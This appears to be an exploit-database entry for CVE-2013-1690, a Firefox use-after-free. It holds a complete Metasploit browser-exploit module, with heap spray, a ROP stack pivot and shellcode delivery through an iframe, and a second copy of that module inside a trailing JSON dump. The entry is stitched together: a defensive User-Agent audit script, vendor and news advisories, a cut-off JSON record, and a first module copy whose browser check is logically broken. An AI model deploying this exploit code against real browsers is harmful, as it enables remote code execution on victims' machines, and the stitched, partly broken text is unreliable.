Firefox onreadystatechange Event DocumentViewerImpl Use After Free
2013-08-08T00:00:00
ID: 1337DAY-ID-21082
Type: zdt
Reporter: metasploit
Modified: 2013-08-08T00:00:00
Description
This Metasploit module exploits a vulnerability in Firefox 17.0.6: a use-after-free of a DocumentViewerImpl object, triggered by a specially crafted web page that uses onreadystatechange events and the window.stop() API. The flaw was exploited in the wild in August 2013 to target Tor Browser users.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info = {})
super(update_info(info,
'Name' => 'Firefox onreadystatechange Event DocumentViewerImpl Use After Free',
'Description' => %q{
This module exploits a vulnerability found on Firefox 17.0.6, specifically an use
after free of a DocumentViewerImpl object, triggered via an specially crafted web
page using onreadystatechange events and the window.stop() API, as exploited in the
wild on 2013 August to target Tor Browser users.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nils', # vulnerability discovery
'Unknown', # 1day exploit, prolly the FBI
'w3bd3vil', # 1day analysis
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-1690' ],
[ 'OSVDB', '94584'],
[ 'BID', '60778'],
[ 'URL', 'https://www.mozilla.org/security/announce/2013/mfsa2013-53.html' ],
[ 'URL', 'https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html' ],
[ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=901365' ],
[ 'URL', 'http://krash.in/ffn0day.txt' ],
[ 'URL', 'http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Firefox 17 & Firefox 21 / Windows XP SP3',
{
'FakeObject' => 0x0c101008, # Pointer to the Sprayed Memory
'RetGadget' => 0x77c3ee16, # ret from msvcrt
'StackPivot' => 0x76C9B4C2, # xchg ecx,esp # or byte ptr[eax], al # add byte ptr [edi+5Eh], bl # ret 8 from IMAGEHLP
'VFuncPtr' => 0x0c10100c # Fake Function Pointer to the Sprayed Memory
}
]
],
'DisclosureDate' => 'Jun 25 2013',
'DefaultTarget' => 0))
end
def stack_pivot
pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18] # get teb
pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit
pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit
pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
return pivot
end
def junk(n=4)
return rand_text_alpha(n).unpack("V").first
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
vprint_status("Agent: #{agent}")
if agent !~ /Windows NT 5\.1/
print_error("Windows XP not found, sending 404: #{agent}")
send_not_found(cli)
return
end
if agent !~ /Firefox\/17/ or agent !~ /Firefox\/21/
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
my_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
# build html
code = [
target['VFuncPtr'],
target['RetGadget'],
target['StackPivot'],
junk
].pack("V*")
code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch))
content = <<-HTML
<html>
<body>
<iframe src="#{my_uri}/iframe.html"></iframe>
</body></html>
HTML
# build iframe
iframe = <<-IFRAME
<script>
var z="<body><img src='nonexistant.html' onerror=\\"\\" ></body>";
var test = new Array();
var heap_chunks;
function heapSpray(shellcode, fillsled) {
var chunk_size, headersize, fillsled_len, code;
var i, codewithnum;
chunk_size = 0x40000;
headersize = 0x10;
fillsled_len = chunk_size - (headersize + shellcode.length);
while (fillsled.length <fillsled_len)
fillsled += fillsled;
fillsled = fillsled.substring(0, fillsled_len);
code = shellcode + fillsled;
heap_chunks = new Array();
for (i = 0; i<1000; i++)
{
codewithnum = "HERE" + code;
heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
}
}
function b() {
for(var c=0;1024>c;c++) {
test[c]=new ArrayBuffer(180);
bufView = new Uint32Array(test[c]);
for (var i=0; i < 45; i++) {
bufView[i] = #{target['FakeObject']};
}
}
}
function a() {
window.stop();
var myshellcode = unescape("#{js_code}");
var myfillsled = unescape("#{js_random}");
heapSpray(myshellcode,myfillsled);
b();
window.parent.frames[0].frameElement.ownerDocument.write(z);
}
document.addEventListener("readystatechange",a,null);
</script>
IFRAME
print_status("URI #{request.uri} requested...")
if request.uri =~ /iframe\.html/
print_status("Sending iframe HTML")
send_response(cli, iframe, {'Content-Type'=>'text/html'})
return
end
print_status("Sending HTML")
send_response(cli, content, {'Content-Type'=>'text/html'})
end
end
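An added example (not part of the Metasploit module or the original advisory): a Ruby audit of proxy-log User-Agent strings for clients exposed to CVE-2013-1690, using the fixed versions published for the CVE (Firefox 22.0, Firefox ESR 17.0.7) and the module's stated target (Firefox 17 or 21 on Windows XP). The log format, the sample lines and all function names are constructed for illustration; a User-Agent that omits the patch level is reported as `verify_build` rather than guessed.

```ruby
# Added example: exposure audit for CVE-2013-1690 from proxy-log User-Agents.
# Hypothetical names and log format; the sample lines below are constructed.

FIXED_ESR17   = [17, 0, 7].freeze  # first fixed Firefox ESR 17.x build
FIXED_MAJOR   = 22                 # first fixed mainline Firefox release
MODULE_MAJORS = [17, 21].freeze    # majors named in the module's target entry

UA_FIREFOX = %r{Firefox/(\d+)(?:\.(\d+))?(?:\.(\d+))?}
UA_WINXP   = /Windows NT 5\.1/
LOG_LINE   = /\A(\S+)\s+"([^"]*)"\s*\z/ # assumed format: <client-ip> "<user-agent>"
SEVERITY   = { vulnerable: 3, verify_build: 2, fixed: 1, not_firefox: 0 }.freeze

# Classify one User-Agent string against the CVE's fixed-version boundaries.
def classify_user_agent(ua)
  ua = ua.to_s
  m = UA_FIREFOX.match(ua)
  return { status: :not_firefox, version: nil, module_target: false } unless m

  major = m[1].to_i
  minor = m[2].to_i
  patch = m[3] && m[3].to_i
  status =
    if major >= FIXED_MAJOR
      :fixed
    elsif major == 17 && patch.nil?
      # "Firefox/17.0" cannot tell 17.0.6 from 17.0.7: check the installed build.
      :verify_build
    elsif major == 17 && ([major, minor, patch] <=> FIXED_ESR17) >= 0
      :fixed
    else
      :vulnerable
    end
  # Hosts matching the public module's target deserve patching first.
  target = status != :fixed && UA_WINXP.match?(ua) && MODULE_MAJORS.include?(major)
  { status: status, version: m[0].sub('Firefox/', ''), module_target: target }
end

# Keep the most severe finding seen for each client address.
def audit_log(text)
  findings = {}
  text.each_line do |line|
    m = LOG_LINE.match(line.chomp)
    next unless m # skip lines that do not match the assumed format

    ip = m[1]
    result = classify_user_agent(m[2])
    prev = findings[ip]
    findings[ip] = result if prev.nil? || SEVERITY[result[:status]] > SEVERITY[prev[:status]]
  end
  findings
end

# One line per client, most severe first.
def report(findings)
  findings.sort_by { |ip, f| [-SEVERITY[f[:status]], ip] }.map do |ip, f|
    flag = f[:module_target] ? ' [matches module target: XP + Firefox 17/21]' : ''
    format('%-12s %-13s Firefox %s%s', ip, f[:status], f[:version] || 'n/a', flag)
  end
end

# Constructed sample log (not real traffic).
SAMPLE_LOG = <<~LOG
  10.0.0.5 "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
  10.0.0.6 "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0"
  10.0.0.7 "Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0"
  10.0.0.8 "Mozilla/5.0 (Windows NT 5.1; rv:17.0.7) Gecko/20100101 Firefox/17.0.7"
  10.0.0.9 "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36"
  10.0.0.5 "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
  malformed line without a quoted agent
LOG

puts report(audit_log(SAMPLE_LOG)) if __FILE__ == $PROGRAM_NAME
```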
'w3bd3vil', # 1day analysis\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1690' ],\n [ 'OSVDB', '94584'],\n [ 'BID', '60778'],\n [ 'URL', 'https://www.mozilla.org/security/announce/2013/mfsa2013-53.html' ],\n [ 'URL', 'https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html' ],\n [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=901365' ],\n [ 'URL', 'http://krash.in/ffn0day.txt' ],\n [ 'URL', 'http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Firefox 17 & Firefox 21 / Windows XP SP3',\n {\n 'FakeObject' => 0x0c101008, # Pointer to the Sprayed Memory\n 'RetGadget' => 0x77c3ee16, # ret from msvcrt\n 'StackPivot' => 0x76C9B4C2, # xcht ecx,esp # or byte ptr[eax], al # add byte ptr [edi+5Eh], bl # ret 8 from IMAGEHLP\n 'VFuncPtr' => 0x0c10100c # Fake Function Pointer to the Sprayed Memory\n }\n ]\n ],\n 'DisclosureDate' => '2013-06-25',\n 'DefaultTarget' => 0))\n\n end\n\n def stack_pivot\n pivot = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\n pivot << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\n pivot << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\n pivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\n return pivot\n end\n\n def junk(n=4)\n return rand_text_alpha(n).unpack(\"V\").first\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n vprint_status(\"Agent: #{agent}\")\n\n if agent !~ /Windows NT 5\\.1/\n print_error(\"Windows XP not found, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n unless agent =~ /Firefox\\/(17|21)/\n print_error(\"Browser not supported, sending 404: 
#{agent}\")\n send_not_found(cli)\n return\n end\n\n my_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource\n\n # build html\n code = [\n target['VFuncPtr'],\n target['RetGadget'],\n target['StackPivot'],\n junk\n ].pack(\"V*\")\n code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})\n js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))\n js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch))\n\n content = <<-HTML\n<html>\n<body>\n<iframe src=\"#{my_uri}/iframe.html\"></iframe>\n</body></html>\n HTML\n\n # build iframe\n iframe = <<-IFRAME\n<script>\nvar z=\"<body><img src='nonexistant.html' onerror=\\\\\"\\\\\" ></body>\";\nvar test = new Array();\nvar heap_chunks;\nfunction heapSpray(shellcode, fillsled) {\n var chunk_size, headersize, fillsled_len, code;\n var i, codewithnum;\n chunk_size = 0x40000;\n headersize = 0x10;\n fillsled_len = chunk_size - (headersize + shellcode.length);\n while (fillsled.length <fillsled_len)\n fillsled += fillsled;\n fillsled = fillsled.substring(0, fillsled_len);\n code = shellcode + fillsled;\n heap_chunks = new Array();\n for (i = 0; i<1000; i++)\n {\n codewithnum = \"HERE\" + code;\n heap_chunks[i] = codewithnum.substring(0, codewithnum.length);\n }\n}\n\n\nfunction b() {\n for(var c=0;1024>c;c++) {\n test[c]=new ArrayBuffer(180);\n bufView = new Uint32Array(test[c]);\n for (var i=0; i < 45; i++) {\n bufView[i] = #{target['FakeObject']};\n }\n }\n}\n\nfunction a() {\n window.stop();\n var myshellcode = unescape(\"#{js_code}\");\n var myfillsled = unescape(\"#{js_random}\");\n heapSpray(myshellcode,myfillsled);\n b();\n window.parent.frames[0].frameElement.ownerDocument.write(z);\n}\n\ndocument.addEventListener(\"readystatechange\",a,null);\n</script>\n IFRAME\n\n print_status(\"URI #{request.uri} requested...\")\n\n if request.uri =~ /iframe\\.html/\n print_status(\"Sending iframe HTML\")\n send_response(cli, 
iframe, {'Content-Type'=>'text/html'})\n return\n end\n\n print_status(\"Sending HTML\")\n send_response(cli, content, {'Content-Type'=>'text/html'})\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb"}], "mozilla": [{"lastseen": "2016-09-05T13:37:40", "bulletinFamily": "software", "cvelist": ["CVE-2013-1690"], "edition": 1, "description": "Security researcher Nils reported that specially crafted web\ncontent using the onreadystatechange event and reloading of pages\ncould sometimes cause a crash when unmapped memory is executed. This crash is\npotentially exploitable.\nIn general these flaws cannot be exploited through email in the\nThunderbird and SeaMonkey products because scripting is disabled, but are\npotentially a risk in browser or browser-like contexts in those products.", "modified": "2013-06-25T00:00:00", "published": "2013-06-25T00:00:00", "id": "MFSA2013-53", "href": "http://www.mozilla.org/en-US/security/advisories/mfsa2013-53/", "type": "mozilla", "title": "Execution of unmapped memory through onreadystatechange event", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:41:44", "description": "CVE(CAN) ID: CVE-2013-1690\r\n\r\nFirefox is a very popular open-source web browser\r\n\r\nMozilla Firefox before 22.0, Firefox ESR 17.x, Thunderbird before 17.0.7, and Thunderbird ESR 
17.x do not properly handle the onreadystatechange event when loading certain pages; a remote attacker can exploit this vulnerability through a specially crafted website that triggers execution of unmapped memory, causing a denial of service or arbitrary code execution\r\n0\r\nMozilla Firefox ESR 17.x\r\nMozilla Firefox <= 22.0\r\nVendor patch:\r\n\r\nMozilla\r\n-------\r\nThe vendor has not yet provided a patch or upgrade; we recommend that users of this software watch the vendor's home page for the latest version:\r\n\r\nhttp://www.mozilla.org/security/", "published": "2013-08-11T00:00:00", "title": "Mozilla Firefox JavaScript Remote Code Execution Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1690"], "modified": "2013-08-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60948", "id": "SSV:60948", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "threatpost": [{"lastseen": "2018-10-06T23:00:05", "bulletinFamily": "info", "cvelist": ["CVE-2012-1723", "CVE-2013-1347", "CVE-2013-1690"], "description": "A string of watering hole attacks targeting oil and energy companies dating back to May could be linked to similar[ attacks against the U.S. 
Department of Labor website](<http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/100081>).\n\nResearchers at Cisco discovered the [compromised domains of 10 oil and energy companies](<http://blogs.cisco.com/security/watering-hole-attacks-target-energy-sector/>) worldwide, including hydroelectric plants, natural gas distributors, industrial suppliers to the energy sector and investment firms serving those markets. Six of the 10 sites shared the same Web design firm and three of the six are owned by the same parent company. Cisco researcher Emmanuel Tacheau speculates that credentials at the Web design firm were stolen, leading to the compromises.\n\nThe 10 sites were exploited and serving iframe redirects to other sites hosting espionage malware, possibly the [Poison Ivy remote access Trojan](<http://threatpost.com/poison-ivy-rat-spotted-in-three-new-attacks/102022>).\n\n\u201cThe assumption is, with the target companies being in the energy sector, they were attempting to infect machines within that sector and exfiltrate intellectual property,\u201d Tacheau said.\n\nThe iframes load exploit code and malware from three compromised domains\u2014keeleux[.]com, kenzhebek[.], and nahoonservices[.]com. The exploits target primarily a Java vulnerability, [CVE-2012-1723](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1723>), or a flaw in Internet Explorer 8, [CVE-2013-1347](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347>). A Firefox exploit was also found in these attacks, [CVE-2013-1690](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1690>).\n\nCisco said the malware used in the attacks is a Trojan that captures system configurations, as well as clipboard and keyboard data. It also establishes an encrypted connection to a command and control server hosted in Greece awaiting commands. 
All of the infected sites were notified and most had been cleaned up, Cisco said.\n\n\u201cDetection for the malware was extremely low, so that\u2019s always a concern,\u201d Tacheau said. \u201cFortunately, exploit detection for the exploits used is pretty good, so hopefully people will have been protected.\u201d\n\nWatering hole attacks are effective because they target websites of interest to the intended victim. In the past, government policy resource websites and mobile developer forums have been compromised in other watering hole attacks.\n\nAt the time of the Department of Labor attacks, also in May, the [IE 8 exploit was a zero-day ](<http://threatpost.com/ie-8-zero-day-found-as-dol-watering-hole-attack-spreads-to-nine-other-sites/100212>)and had infected the DOL\u2019s Site Exposure Matrices (SEM) website with javascript redirecting victims to the Poison Ivy RAT. The SEM website is a repository of data on toxic substances found at facilities run by the Department of Energy. At the time, security experts speculated the attackers were targeting DOE employees working on nuclear weapons programs.\n\nThe [IE vulnerability was patched in May](<http://threatpost.com/microsoft-patches-department-of-labor-pwn2own-ie-vulnerabilities/100633>), but not before those [attacks spread to nine other sites including the US Agency for International Development (USAID)](<http://threatpost.com/usaid-workers-also-targeted-by-dol-watering-hole-attackers/100528>) and research firms in Asia.\n\nGiven the timing of the two attacks and the use of the same Internet Explorer exploit, the Department of Labor attacks could be tied to the energy and oil attacks as well.\n\n\u201cThat\u2019s the million dollar question,\u201d Tacheau said. \u201cThere certainly are a lot of commonalities. 
If you combine the timing, the shared exploit and the sector targeted, it does seem at least suspiciously in favor of a semblance of attackers.\u201d\n\nThe oil and energy attacks, however, were found coincidentally by Cisco researchers looking at system logs and noticing the commonalities in the sectors targeted.\n\n\u201cIt boils down to a matter of volume,\u201d Tacheau said. \u201cThese were low volume-high stakes attacks; these sites don\u2019t attract a large number of visitors. The DOL attacks were different. When you have a high profile site like that, those are always going to be spotted off the bat.\u201d\n\n[_Image courtesy KenHodge13 Flickr_](<http://www.flickr.com/photos/40132991@N07/>)\n", "modified": "2013-09-24T19:10:09", "published": "2013-09-19T15:55:05", "id": "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB", "href": "https://threatpost.com/oil-energy-watering-hole-attacks-could-be-tied-to-dol-attacks/102366/", "type": "threatpost", "title": "Oil, Energy Watering Hole Attacks Linked to DOL attack", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:31:56", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "Mozilla Firefox has been updated to the 17.0.7 ESR version,\n which fixes bugs and security issues.\n\n *\n\n MFSA 2013-49: Mozilla developers identified and fixed\n several memory safety bugs in the browser engine used in\n Firefox and other Mozilla-based products. Some of these\n bugs showed evidence of memory corruption under certain\n circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code.\n\n Gary Kwong, Jesse Ruderman, and Andrew McCreight\n reported memory safety problems and crashes that affect\n Firefox ESR 17, and Firefox 21. 
(CVE-2013-1682)\n\n *\n\n MFSA 2013-50: Security researcher Abhishek Arya\n (Inferno) of the Google Chrome Security Team used the\n Address Sanitizer tool to discover a series of\n use-after-free problems rated critical as security issues\n in shipped software. Some of these issues are potentially\n exploitable, allowing for remote code execution. We would\n also like to thank Abhishek for reporting additional\n use-after-free and buffer overflow flaws in code introduced\n during Firefox development. These were fixed before general\n release.\n\n o Heap-use-after-free in\n mozilla::dom::HTMLMediaElement::LookupMediaElementURITable\n (CVE-2013-1684) o Heap-use-after-free in\n nsIDocument::GetRootElement (CVE-2013-1685) o\n Heap-use-after-free in mozilla::ResetDir (CVE-2013-1686)\n *\n\n MFSA 2013-51 / CVE-2013-1687: Security researcher\n Mariusz Mlynski reported that it is possible to compile a\n user-defined function in the XBL scope of a specific\n element and then trigger an event within this scope to run\n code. In some circumstances, when this code is run, it can\n access content protected by System Only Wrappers (SOW) and\n chrome-privileged pages. This could potentially lead to\n arbitrary code execution. Additionally, Chrome Object\n Wrappers (COW) can be bypassed by web content to access\n privileged methods, leading to a cross-site scripting (XSS)\n attack from privileged pages.\n\n *\n\n MFSA 2013-53 / CVE-2013-1690: Security researcher\n Nils reported that specially crafted web content using the\n onreadystatechange event and reloading of pages could\n sometimes cause a crash when unmapped memory is executed.\n This crash is potentially exploitable.\n\n *\n\n MFSA 2013-54 / CVE-2013-1692: Security researcher\n Johnathan Kuskos reported that Firefox is sending data in\n the body of XMLHttpRequest (XHR) HEAD requests, which goes\n against the XHR specification. 
This can potentially be used\n for Cross-Site Request Forgery (CSRF) attacks against sites\n which do not distinguish between HEAD and POST requests.\n\n *\n\n MFSA 2013-55 / CVE-2013-1693: Security researcher\n Paul Stone of Context Information Security discovered that\n timing differences in the processing of SVG format images\n with filters could allow for pixel values to be read. This\n could potentially allow for text values to be read across\n domains, leading to information disclosure.\n\n *\n\n MFSA 2013-59 / CVE-2013-1697: Mozilla security\n researcher moz_bug_r_a4 reported that XrayWrappers can be\n bypassed to call content-defined toString and valueOf\n methods through DefaultValue. This can lead to unexpected\n behavior when privileged code acts on the incorrect values.\n", "edition": 1, "modified": "2013-07-05T22:04:18", "published": "2013-07-05T22:04:18", "id": "SUSE-SU-2013:1153-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00011.html", "type": "suse", "title": "Security update for Mozilla Firefox (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:37:19", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "MozillaThunderbird was updated to Thunderbird 17.0.7\n (bnc#825935)\n\n Security issues fixed:\n * MFSA 2013-49/CVE-2013-1682 Miscellaneous memory safety\n hazards\n * MFSA 2013-50/CVE-2013-1684/CVE-2013-1685/CVE-2013-1686\n Memory corruption found using Address Sanitizer\n * MFSA 2013-51/CVE-2013-1687 (bmo#863933, bmo#866823)\n Privileged content access and execution via XBL\n * MFSA 2013-53/CVE-2013-1690 (bmo#857883) Execution of\n unmapped memory through onreadystatechange event\n * MFSA 2013-54/CVE-2013-1692 (bmo#866915) Data in the\n body of XHR HEAD 
requests leads to CSRF attacks\n * MFSA 2013-55/CVE-2013-1693 (bmo#711043) SVG filters can\n lead to information disclosure\n * MFSA 2013-56/CVE-2013-1694 (bmo#848535) PreserveWrapper\n has inconsistent behavior\n * MFSA 2013-59/CVE-2013-1697 (bmo#858101) XrayWrappers\n can be bypassed to run user defined methods in a\n privileged context\n\n", "edition": 1, "modified": "2013-07-04T12:04:15", "published": "2013-07-04T12:04:15", "id": "OPENSUSE-SU-2013:1141-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00004.html", "type": "suse", "title": "MozillaThunderbird: 17.0.7 (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:38:53", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "Mozilla xulrunner was updated to 17.0.7esr (bnc#825935)\n\n Security issues fixed:\n * MFSA 2013-49/CVE-2013-1682 Miscellaneous memory safety\n hazards\n * MFSA 2013-50/CVE-2013-1684/CVE-2013-1685/CVE-2013-1686\n Memory corruption found using Address Sanitizer\n * MFSA 2013-51/CVE-2013-1687 (bmo#863933, bmo#866823)\n Privileged content access and execution via XBL\n * MFSA 2013-53/CVE-2013-1690 (bmo#857883) Execution of\n unmapped memory through onreadystatechange event\n * MFSA 2013-54/CVE-2013-1692 (bmo#866915) Data in the\n body of XHR HEAD requests leads to CSRF attacks\n * MFSA 2013-55/CVE-2013-1693 (bmo#711043) SVG filters can\n lead to information disclosure\n * MFSA 2013-56/CVE-2013-1694 (bmo#848535) PreserveWrapper\n has inconsistent behavior\n * MFSA 2013-59/CVE-2013-1697 (bmo#858101) XrayWrappers\n can be bypassed to run user defined methods in a\n privileged context\n\n", "edition": 1, "modified": "2013-07-04T12:04:46", "published": "2013-07-04T12:04:46", "id": "OPENSUSE-SU-2013:1143-1", "href": 
"http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00006.html", "type": "suse", "title": "xulrunner: 17.0.7esr (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:23:06", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1696", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1695", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1688", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1683", "CVE-2013-1693"], "description": "update to Firefox 22.0 and Thunderbird 17.0.7 including the\n following security fixes\n * MFSA 2013-49 Miscellaneous memory safety hazards\n * MFSA 2013-50 Memory corruption found using Address\n Sanitizer\n * MFSA 2013-51 Privileged content access and execution via\n XBL\n * MFSA 2013-52 Arbitrary code execution within Profiler\n * MFSA 2013-53 Execution of unmapped memory through\n onreadystatechange event\n * MFSA 2013-54 Data in the body of XHR HEAD requests leads\n to CSRF attacks\n * MFSA 2013-55 SVG filters can lead to information\n disclosure\n * MFSA 2013-56 PreserveWrapper has inconsistent behavior\n * MFSA 2013-57 Sandbox restrictions not applied to nested\n frame elements\n * MFSA 2013-58 X-Frame-Options ignored when using server\n push with multi-part responses\n * MFSA 2013-59 XrayWrappers can be bypassed to run user\n defined methods in a privileged context\n\n", "edition": 1, "modified": "2013-07-04T09:04:31", "published": "2013-07-04T09:04:31", "id": "OPENSUSE-SU-2013:1140-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00003.html", "type": "suse", "title": "regular updates for Mozilla applications (FF/TB) (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:38:48", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1696", "CVE-2013-1685", 
"CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1695", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1688", "CVE-2013-1686", "CVE-2013-1698", "CVE-2013-1682", "CVE-2013-1683", "CVE-2013-1693"], "description": "Seamonkey was updated to version 2.19\n\n * MFSA 2013-49/CVE-2013-1682/CVE-2013-1683 Miscellaneous\n memory safety hazards\n * MFSA 2013-50/CVE-2013-1684/CVE-2013-1685/CVE-2013-1686\n Memory corruption found using Address Sanitizer\n * MFSA 2013-51/CVE-2013-1687 (bmo#863933, bmo#866823)\n Privileged content access and execution via XBL\n * MFSA 2013-52/CVE-2013-1688 (bmo#873966) Arbitrary code\n execution within Profiler\n * MFSA 2013-53/CVE-2013-1690 (bmo#857883) Execution of\n unmapped memory through onreadystatechange event\n * MFSA 2013-54/CVE-2013-1692 (bmo#866915) Data in the\n body of XHR HEAD requests leads to CSRF attacks\n * MFSA 2013-55/CVE-2013-1693 (bmo#711043) SVG filters can\n lead to information disclosure\n * MFSA 2013-56/CVE-2013-1694 (bmo#848535) PreserveWrapper\n has inconsistent behavior\n * MFSA 2013-57/CVE-2013-1695 (bmo#849791) Sandbox\n restrictions not applied to nested frame elements\n * MFSA 2013-58/CVE-2013-1696 (bmo#761667) X-Frame-Options\n ignored when using server push with multi-part responses\n * MFSA 2013-59/CVE-2013-1697 (bmo#858101) XrayWrappers\n can be bypassed to run user defined methods in a\n privileged context\n * MFSA 2013-60/CVE-2013-1698 (bmo#876044)\n\n", "edition": 1, "modified": "2013-07-11T06:04:11", "published": "2013-07-11T06:04:11", "id": "OPENSUSE-SU-2013:1176-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00015.html", "type": "suse", "title": "update to SeaMonkey 2.19 (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:56:41", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1696", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1695", 
